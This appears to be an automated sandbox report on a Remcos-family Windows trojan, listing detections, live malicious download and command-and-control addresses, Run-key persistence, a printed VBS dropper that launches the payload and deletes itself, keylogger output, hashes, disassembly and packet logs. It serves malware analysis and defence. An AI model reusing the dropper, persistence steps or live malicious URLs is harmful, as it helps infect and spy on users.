35->49 63 Tries to detect Any.run 35->63 65 Hides threads from debuggers 35->65 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.__vbaHresultCheckObj.9138.exe32%VirustotalBrowse
            SecuriteInfo.com.__vbaHresultCheckObj.9138.exe13%ReversingLabsWin32.Trojan.Vebzenpak

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\win.exe13%ReversingLabsWin32.Trojan.Vebzenpak

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu10%VirustotalBrowse
            ztechinternational.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binH0%Avira URL Cloudsafe
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin1%VirustotalBrowse
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin0%Avira URL Cloudsafe
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binz0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu
            188.72.110.19
            truetrueunknown
            ztechinternational.com
            192.185.113.219
            truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bintrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binHSecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350529718.0000000000927000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binzSecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350529718.0000000000927000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            188.72.110.19
            gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euNetherlands
            43289TRABIAMDtrue
            192.185.113.219
            ztechinternational.comUnited States
            46606UNIFIEDLAYER-AS-1UStrue

            General Information

            Joe Sandbox Version:32.0.0 Black Diamond
            Analysis ID:430702
            Start date:07.06.2021
            Start time:20:38:28
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 8s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:SecuriteInfo.com.__vbaHresultCheckObj.9138.5973 (renamed file extension from 5973 to exe)
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@18/8@9/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 2.1% (good quality ratio 0.6%)
            • Quality average: 15.2%
            • Quality standard deviation: 25.8%
            HCA Information:
            • Successful, ratio: 71%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Override analysis time to 240s for sample files taking high CPU consumption
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 104.43.139.144, 13.88.21.125, 104.42.151.234, 204.79.197.200, 13.107.21.200, 92.122.145.220, 23.57.80.111, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            20:40:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
            20:40:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
            20:41:46API Interceptor866x Sleep call for process: win.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            192.185.113.219MLJ.exeGet hashmaliciousBrowse
            • ztechinternational.com/dk/Maily%20_remcos_poYYVI175.bin

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu6NcvrNwxSh.exeGet hashmaliciousBrowse
            • 46.243.237.125
            FcMJC6EWgP.exeGet hashmaliciousBrowse
            • 104.250.182.36
            CLAVIS INVESTMENTS.xlsxGet hashmaliciousBrowse
            • 104.250.182.19
            Jo_No_23539-2020-21.xlsxGet hashmaliciousBrowse
            • 46.243.239.27
            04th-soa.xlsxGet hashmaliciousBrowse
            • 188.72.119.8
            67e197ce_by_Libranalysis.exeGet hashmaliciousBrowse
            • 188.72.119.8
            xw7XNGJuDd.exeGet hashmaliciousBrowse
            • 48.243.150.40
            GaGrozugEz.exeGet hashmaliciousBrowse
            • 188.72.103.46
            SecuriteInfo.com.Trojan.DownLoader33.63577.17975.exeGet hashmaliciousBrowse
            • 172.111.144.45
            d30Q4vWTPV.exeGet hashmaliciousBrowse
            • 188.72.119.23
            OyqjNB5U6L.exeGet hashmaliciousBrowse
            • 45.74.19.137
            z58jIyPXMj.exeGet hashmaliciousBrowse
            • 46.243.222.26
            SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
            • 172.111.156.27
            Quote Requirement.docGet hashmaliciousBrowse
            • 172.111.156.43
            PMTI000021.docGet hashmaliciousBrowse
            • 172.111.156.43
            SecuriteInfo.com.FileRepMalware.exeGet hashmaliciousBrowse
            • 46.243.233.82
            K8vJWv8Niw.exeGet hashmaliciousBrowse
            • 188.72.85.70
            ztechinternational.comMLJ.exeGet hashmaliciousBrowse
            • 192.185.113.219

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            UNIFIEDLAYER-AS-1USMLJ.exeGet hashmaliciousBrowse
            • 192.185.113.219
            LEMOH.exeGet hashmaliciousBrowse
            • 162.241.219.209
            03062021.exeGet hashmaliciousBrowse
            • 162.241.253.69
            Shipment documents.exeGet hashmaliciousBrowse
            • 192.185.190.186
            statistic-608048546.xlsGet hashmaliciousBrowse
            • 192.185.225.204
            statistic-608048546.xlsGet hashmaliciousBrowse
            • 192.185.225.204
            AHG QUOTE pdf 76530.exeGet hashmaliciousBrowse
            • 192.185.41.225
            Invoice number FV0062022020.exeGet hashmaliciousBrowse
            • 74.220.199.6
            Payment slip.exeGet hashmaliciousBrowse
            • 50.87.170.32
            SOA_Outstanding_Balance.exeGet hashmaliciousBrowse
            • 192.185.129.69
            RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
            • 162.241.27.245
            ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
            • 192.185.20.31
            oVA5JBAJutcna88.exeGet hashmaliciousBrowse
            • 50.87.253.188
            a8eC6O6okf.exeGet hashmaliciousBrowse
            • 50.87.146.99
            oNUUaugLQjvRcCL.exeGet hashmaliciousBrowse
            • 50.87.151.118
            CAS No. 584-84-9.exeGet hashmaliciousBrowse
            • 162.144.13.239
            CAS No. 9004-65-3.exeGet hashmaliciousBrowse
            • 162.144.13.239
            02357#U260eThomas#Ud83d#Udce0.HTMGet hashmaliciousBrowse
            • 192.185.198.10
            6dTTv9IdCw.exeGet hashmaliciousBrowse
            • 74.220.199.8
            NEW ORDER 0034543PDF.exeGet hashmaliciousBrowse
            • 192.185.164.148
            TRABIAMDKJN55hQKh2.exeGet hashmaliciousBrowse
            • 178.17.170.132
            How-To-Get-A-Statement-From-Netspend.exeGet hashmaliciousBrowse
            • 192.121.87.53
            t.exeGet hashmaliciousBrowse
            • 185.177.151.42
            2f50000.exeGet hashmaliciousBrowse
            • 185.177.151.42
            31768ba567580677ef466b1451e012d1fd35341ca7ec9.exeGet hashmaliciousBrowse
            • 178.175.148.83
            IMG60378611.docGet hashmaliciousBrowse
            • 178.175.148.83
            IMG_50_78_63.xlsGet hashmaliciousBrowse
            • 178.17.171.144
            IMG_50_78_63.xlsGet hashmaliciousBrowse
            • 178.17.171.144
            PO_723_057_35.xlsGet hashmaliciousBrowse
            • 178.17.171.144
            PO_723_057_35.xlsGet hashmaliciousBrowse
            • 178.17.171.144
            IMG_785_08_87.docGet hashmaliciousBrowse
            • 178.17.171.144
            IMG_107_85_02_37.docGet hashmaliciousBrowse
            • 178.17.171.144
            Payment_Advice Pdf10375200148940150.docGet hashmaliciousBrowse
            • 178.17.171.144
            ETL_126_072_60.docGet hashmaliciousBrowse
            • 178.17.171.144
            IMG_102-05_78_6.docGet hashmaliciousBrowse
            • 178.17.171.144
            TaTYytHaBk.exeGet hashmaliciousBrowse
            • 178.17.170.112
            SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
            • 178.17.171.197
            530000.exeGet hashmaliciousBrowse
            • 185.177.151.42
            6a0000.exeGet hashmaliciousBrowse
            • 178.17.170.88
            6d0000.exeGet hashmaliciousBrowse
            • 185.177.151.33

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\install.vbs
            Process:C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            File Type:data
            Category:modified
            Size (bytes):400
            Entropy (8bit):3.4932995649361622
            Encrypted:false
            SSDEEP:12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
            MD5:69339977F20CBF10E59B9609355FDAD1
            SHA1:28275BF11AF1EAA7B41AB836BBFD85F9A59C99EF
            SHA-256:180976FE30D7F115FF9112B387D7CC4B533B2E58EDCDC6EFA18121C590C59D9A
            SHA-512:17A8ABD09E280000D4CADB466777CDF83387D7021572FFC8360A01CDD2B13FC5A81351FA2708AC74B441B0C7DE2B0A9ACF0CF28EDCAE7C12101268C541288764
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
            C:\Users\user\AppData\Roaming\logs.dat
            Process:C:\Users\user\AppData\Roaming\win.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):74
            Entropy (8bit):4.700998596636514
            Encrypted:false
            SSDEEP:3:ttUbV2aTF7LrA4RXMRPHv31aeo:tmLJ/XqdHv3IP
            MD5:46E680FC196FD7A87F829F037DC0E1C8
            SHA1:0399789B91B2B8B6983B64A730BD8DC5180FC2BE
            SHA-256:6FDC5B1AC2CDA7E8F0E7FDB618FCE128C8C6E24EAC873E2FA51F979946F5BE9F
            SHA-512:59A534B44284262764474444807F8EFA5AF61FDDC58382786072EBC9EEB840A1F3F810E9917CFD5E9DF08CAC35C15866AA18AAABC36A11C4C776C9804F60B9E0
            Malicious:false
            Reputation:low
            Preview: ..[2021/06/07 20:41:46 Offline Keylogger Started]....[ Program Manager ]..
            C:\Users\user\AppData\Roaming\win.exe
            Process:C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):110592
            Entropy (8bit):6.27480729113905
            Encrypted:false
            SSDEEP:3072:68n1eqngtFaxWqEfGBpQ2JyB92mTZP9dsWtnHlvXzyoyZlGLwh/9Gco:6XFaxWqEfGBpQ2JyB92mTZP9dsSno/9J
            MD5:6AA873EE68B60704E3D00F5C885A90F7
            SHA1:C1A1601CE429CF7CB2D4C255325BF408FE69B1D5
            SHA-256:32DCDBAC829F1B6607C1581488A6CF95541FBA686F5F81C23B9E1E79761A971B
            SHA-512:AC7D6F8197CE8149CAE32BFC45DD499C0A02F1AA03190A41E3FDB07AF68D4826ECAD2624A2FF229A200AD9F96A84104D11C2C94773B3A4A6E9E3D5A0EC793D7A
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 13%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0....................@.................................. ......................................4...(...........................................................................(... ....................................text............................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier
            Process:C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Reputation:high, very likely benign file
            Preview: [ZoneTransfer]....ZoneId=0
            C:\Windows\Lwo7
            Process:C:\Users\user\AppData\Roaming\win.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):56
            Entropy (8bit):3.521640636343319
            Encrypted:false
            SSDEEP:3:RRQRRQRRQRRQn:qQQS
            MD5:A0C9E601546791A2A273DEAC8256A3E5
            SHA1:4014E6DD93022436BEB51DFB32BDF995542C3942
            SHA-256:77F928BAFA7CCBF6071DD1DC877C30D5C9E1380F53F31A7283AE769B0C9BE20D
            SHA-512:7F19CBF8F2D17B6632E4CAB562F6936EB791D1738C93A83CC61E4470780B84DCBFDB4D935324474CC0665882A04EA64FABF25DA2405263C7A668FD1B42CFD4F7
            Malicious:false
            Reputation:low
            Preview: Chittamwood3..Chittamwood3..Chittamwood3..Chittamwood3..

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.27480729113905
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            File size:110592
            MD5:6aa873ee68b60704e3d00f5c885a90f7
            SHA1:c1a1601ce429cf7cb2d4c255325bf408fe69b1d5
            SHA256:32dcdbac829f1b6607c1581488a6cf95541fba686f5f81c23b9e1e79761a971b
            SHA512:ac7d6f8197ce8149cae32bfc45dd499c0a02f1aa03190a41e3fdb07af68d4826ecad2624a2ff229a200ad9f96a84104d11c2c94773b3a4a6e9e3d5a0ec793d7a
            SSDEEP:3072:68n1eqngtFaxWqEfGBpQ2JyB92mTZP9dsWtnHlvXzyoyZlGLwh/9Gco:6XFaxWqEfGBpQ2JyB92mTZP9dsSno/9J
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0....................@................

            File Icon

            Icon Hash:2828bae9d2777576

            Static PE Info

            General

            Entrypoint:0x4015d0
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x481B81AA [Fri May 2 21:03:38 2008 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:20511f60b3c62ae145d60c4c066b22a5

            Entrypoint Preview

            Instruction
            push 00401D68h
            call 00007F8D48AA69C3h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            cmp byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xchg cl, ah
            fcomp3 st(2)
            and bl, bl
            inc ebx
            lodsb
            mov esi, A147699Dh
            xchg eax, ebp
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            and byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            push edx
            imul ebp, dword ptr [ebp+65h], 00357374h
            add byte ptr [eax], al
            add byte ptr [eax], al
            dec esp
            xor dword ptr [eax], eax
            add dh, al
            add byte ptr [edx], dh
            out dx, al
            inc ebp
            out dx, al
            push esp
            dec ebp
            xchg eax, esi
            retf
            jmp 00007F8D46DE92F6h
            lea edi, dword ptr [eax+49h]
            sbb bh, byte ptr [ecx+79h]
            jl 00007F8D48AA699Eh
            inc eax
            xchg eax, edx
            mov ebp, FA337472h
            dec ebp
            pop ss
            cmp cl, byte ptr [edi-53h]
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            pop dword ptr [esi]
            add byte ptr [eax], al
            mov al, byte ptr [esi]
            add byte ptr [eax], al
            add byte ptr [ebx], cl
            add byte ptr [eax+65h], dl
            jc 00007F8D48AA6A35h
            outsd
            insb
            popad
            je 00007F8D48AA6A3Bh
            jbe 00007F8D48AA6A37h
            add byte ptr [46000B01h], cl
            imul ebp, dword ptr [esi+61h], 6E656C62h
            jnc 00007F8D48AA6A46h

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x189340x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000x9d8.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x17ff80x18000False0.472686767578data6.66010575968IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x190000x121c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x1b0000x9d80x1000False0.227294921875data2.13794721656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x1b6f00x2e8data
            RT_ICON0x1b5080x1e8data
            RT_ICON0x1b3e00x128GLS_BINARY_LSB_FIRST
            RT_GROUP_ICON0x1b3b00x30data
            RT_VERSION0x1b1500x260dataEnglishUnited States

            Imports

            DLLImport
            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaStrComp, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

            Version Infos

            DescriptionData
            Translation0x0409 0x04b0
            InternalNamesydvestenvinden
            FileVersion1.00
            CompanyNameMarbleStone
            CommentsMarbleStone
            ProductNameRimets5
            ProductVersion1.00
            OriginalFilenamesydvestenvinden.exe

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jun 7, 2021 20:40:15.215811014 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:15.378276110 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:15.378422022 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.131059885 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.290630102 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297375917 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297405958 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297421932 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297440052 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297457933 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297477007 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297493935 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297511101 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297532082 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297547102 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.297550917 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.297597885 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.297605038 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.456785917 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456821918 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456840992 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456861019 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456881046 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456896067 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456913948 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456918955 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.456932068 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456949949 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456953049 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.456959009 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.456967115 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456984997 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.456998110 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457005024 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457010031 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457025051 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457041979 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457056046 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457058907 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457077980 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457088947 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457093954 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457110882 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457112074 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457129002 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457139015 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457150936 CEST8049715192.185.113.219192.168.2.5
            Jun 7, 2021 20:40:16.457180023 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.457209110 CEST4971580192.168.2.5192.185.113.219
            Jun 7, 2021 20:40:16.616300106 CEST8049715192.185.113.219192.168.2.5
